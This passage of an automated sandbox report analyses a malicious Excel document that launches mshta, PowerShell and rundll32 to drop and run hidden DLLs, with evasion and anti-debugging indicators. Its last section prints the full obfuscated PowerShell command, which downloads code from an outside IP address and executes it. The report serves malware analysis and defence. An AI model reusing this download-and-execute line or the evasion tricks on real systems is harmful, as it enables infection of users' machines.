Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Loacxlk\dndx.ncb",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",ntwFGKOXv Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",AsDMHz Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD171.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdbK source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665854474.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
Source: 314D.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_02D300C5 push 8B490293h; iretd 4_3_02D300CB
Source: C:\Windows\System32\mshta.exe Code function: 4_3_02D308CC push 8B490293h; iretd 4_3_02D308D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004C0C04 push ss; ret 12_2_004C0E40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004C0F14 push FFFFFFF8h; retf 12_2_004C0F23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310C04 push ss; ret 15_2_00310E40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00310F14 push FFFFFFF8h; retf 15_2_00310F23
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8e522

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Loacxlk\dndx.ncb (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Loacxlk\dndx.ncb (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Loacxlk\dndx.ncb:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wjrjy\iojmtizxks.ova:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Htryahunxvozuf\xwruyhjnwpwdsh.vgm:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 1348 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000C.00000002.578867676.00000000002FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002A4087 mov eax, dword ptr fs:[00000030h] 9_2_002A4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00474087 mov eax, dword ptr fs:[00000030h] 10_2_00474087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00244087 mov eax, dword ptr fs:[00000030h] 11_2_00244087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B3487 mov eax, dword ptr fs:[00000030h] 12_2_004B3487
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194087 mov eax, dword ptr fs:[00000030h] 12_2_00194087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00464087 mov eax, dword ptr fs:[00000030h] 14_2_00464087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00303487 mov eax, dword ptr fs:[00000030h] 15_2_00303487
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_001F4087 mov eax, dword ptr fs:[00000030h] 15_2_001F4087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
